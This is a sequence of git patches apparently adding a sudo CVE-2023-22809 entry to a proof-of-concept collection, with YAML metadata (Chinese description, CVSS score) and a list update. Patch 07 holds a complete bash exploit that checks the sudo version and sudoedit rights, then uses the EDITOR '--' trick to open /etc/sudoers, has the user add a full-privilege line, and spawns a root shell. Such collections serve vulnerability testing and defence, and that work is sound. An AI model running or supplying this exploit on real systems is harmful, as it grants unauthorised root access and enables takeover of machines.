From f966c1d3300baf1cd9b2029a1aa81b4e93e24132 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:47:45 +0000 Subject: [PATCH 01/12] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202023?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/sudo/2023/.keep diff --git a/cve/sudo/2023/.keep b/cve/sudo/2023/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From bfbfe22994d4c4cf75e39bbfe700f8b82730c69a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:48:11 +0000 Subject: [PATCH 02/12] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20taml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/taml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/sudo/2023/taml/.keep diff --git a/cve/sudo/2023/taml/.keep b/cve/sudo/2023/taml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 529eee531236d6e21fb374a051c5cfc33e40374f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:48:26 +0000 Subject: [PATCH 03/12] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/sudo/20?= =?UTF-8?q?23/taml=20=E4=B8=BA=20cve/sudo/2023/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/{taml => yaml}/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/sudo/2023/{taml => yaml}/.keep (100%) diff --git a/cve/sudo/2023/taml/.keep b/cve/sudo/2023/yaml/.keep similarity index 100% rename from cve/sudo/2023/taml/.keep rename to cve/sudo/2023/yaml/.keep -- Gitee From d9e65e876434ac35099473c14c2fb433a831c01d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:48:35 +0000 Subject: [PATCH 04/12] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/sudo/2023/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/sudo/2023/.keep diff --git a/cve/sudo/2023/.keep b/cve/sudo/2023/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f566ba408ce2dd237eeb6d92bbce0d3558902a9b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:48:50 +0000 Subject: [PATCH 05/12] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2023-22809?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/CVE-2023-22809/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/sudo/2023/CVE-2023-22809/.keep diff --git a/cve/sudo/2023/CVE-2023-22809/.keep b/cve/sudo/2023/CVE-2023-22809/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From c5d4cfbbaa24633e3770dd4ab8fb65e7e984621d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:49:17 +0000 Subject: [PATCH 06/12] add cve/sudo/2023/CVE-2023-22809. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 嘻嘻 <862623087@qq.com> --- cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh diff --git a/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh b/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh new file mode 100644 index 00000000..e69de29b -- Gitee From 5d4033a947773a7bc11b7cd09ea7b356e5558486 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:50:29 +0000 Subject: [PATCH 07/12] update cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 嘻嘻 <862623087@qq.com> --- .../2023/CVE-2023-22809/CVE-2023-22809.sh | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) diff --git a/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh b/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh index e69de29b..040199d3 100644 --- a/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh +++ b/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh @@ -0,0 +1,41 @@ +#!/usr/bin/env bash +# +# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation +# +# Exploit Author: n3m1.sys +# CVE: CVE-2023-22809 +# Date: 2023/01/21 +# Vendor Homepage: https://www.sudo.ws/ +# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz +# Version: 1.8.0 to 1.9.12p1 +# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9 +# +# Running this exploit on a vulnerable system allows a localiattacker to gain +# a root shell on the machine. +# +# The exploit checks if the current user has privileges to run sudoedit or +# sudo -e on a file as root. If so it will open the sudoers file for the +# attacker to add a line to gain privileges on all the files and get a root +# shell. + +if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$' +then + echo "> Currently installed sudo version is not vulnerable" + exit 1 +fi + +EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-) + +if [ -z "$EXPLOITABLE" ]; then + echo "> It doesn't seem that this user can run sudoedit as root" + read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2 +else + echo "> BINGO! User exploitable" +fi + +echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" +echo "$USER ALL=(ALL:ALL) ALL" +read -n 1 -s -r -p "Press any key to continue..." +EDITOR="vim -- /etc/sudoers" $EXPLOITABLE +sudo su root +exit 0 \ No newline at end of file -- Gitee From bb46cc2f21305230be80243d4f739a3b0fc0eadf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:50:48 +0000 Subject: [PATCH 08/12] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/sudo/2023/CVE-2023-22809/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/CVE-2023-22809/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/sudo/2023/CVE-2023-22809/.keep diff --git a/cve/sudo/2023/CVE-2023-22809/.keep b/cve/sudo/2023/CVE-2023-22809/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 517893175f4f7238fe483b2478e0afa89d513982 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:51:29 +0000 Subject: [PATCH 09/12] add cve/sudo/2023/yaml/CVE-2023-22809.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 嘻嘻 <862623087@qq.com> --- cve/sudo/2023/yaml/CVE-2023-22809.yaml | 45 ++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 cve/sudo/2023/yaml/CVE-2023-22809.yaml diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml new file mode 100644 index 00000000..d004b67c --- /dev/null +++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml @@ -0,0 +1,45 @@ +FormatVer: 20230308 +Id: CVE-2023-22809 +Belong: system +PocHazardLevel: low +Source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc +SiteInfo: + Name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 + Severity: high + Description: + Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 + ScopeOfInfluence: + sudo@[1.8.0, 1.9.12p2) + References: + - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 + SiteClassification: + CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + CvssScore: 7.8 + CveId: CVE-2023-22809 + CweId: CWE-269 + CnvdId: None + KveId: None + Tags: + - 特权管理不当 +SiteRequests: + Implement: + ImArray: + - Inter : bash + InterArgs : + Exec : CVE-2023-22809.sh + Args : + ExpireTime: #second + + # < input + # > output + # . wait + # ? condition + # : content + # + #组合起来 + # >. 等待直到输出 + # << 输入字符 + # >?判断条件 + Inter: + - ">?:BINGO! User exploitable" #ture + Condition: None \ No newline at end of file -- Gitee From 57340027136f2325d777a75c1ea3f9e5da56df96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:51:40 +0000 Subject: [PATCH 10/12] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/sudo/2023/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/sudo/2023/yaml/.keep diff --git a/cve/sudo/2023/yaml/.keep b/cve/sudo/2023/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 499ed225239a6a6e2ebca7a662d64bba6a6d08bd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:53:56 +0000 Subject: [PATCH 11/12] update cve/sudo/2023/yaml/CVE-2023-22809.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 嘻嘻 <862623087@qq.com> --- cve/sudo/2023/yaml/CVE-2023-22809.yaml | 59 ++++++++------------------ 1 file changed, 17 insertions(+), 42 deletions(-) diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml index d004b67c..8fad7320 100644 --- a/cve/sudo/2023/yaml/CVE-2023-22809.yaml +++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml @@ -1,45 +1,20 @@ -FormatVer: 20230308 -Id: CVE-2023-22809 -Belong: system -PocHazardLevel: low -Source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc -SiteInfo: - Name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 - Severity: high - Description: +id: CVE-2023-22809 +source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc +info: + name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 + severity: high + description: Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 - ScopeOfInfluence: + scope-of-influence: sudo@[1.8.0, 1.9.12p2) - References: + references: - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 - SiteClassification: - CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - CvssScore: 7.8 - CveId: CVE-2023-22809 - CweId: CWE-269 - CnvdId: None - KveId: None - Tags: - - 特权管理不当 -SiteRequests: - Implement: - ImArray: - - Inter : bash - InterArgs : - Exec : CVE-2023-22809.sh - Args : - ExpireTime: #second - - # < input - # > output - # . wait - # ? condition - # : content - # - #组合起来 - # >. 等待直到输出 - # << 输入字符 - # >?判断条件 - Inter: - - ">?:BINGO! User exploitable" #ture - Condition: None \ No newline at end of file + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-22809 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: + - 特权管理不当 \ No newline at end of file -- Gitee From a26e6385a1c1edf77f1da148fd8d875b957d5292 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:55:47 +0000 Subject: [PATCH 12/12] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 嘻嘻 <862623087@qq.com> --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 1c5bc747..5133d525 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -17,6 +17,7 @@ cve: - CVE-2022-2588 sudo: - CVE-2021-3156 + - CVE-2023-22809 gitlab: - CVE-2021-22205 confluence: -- Gitee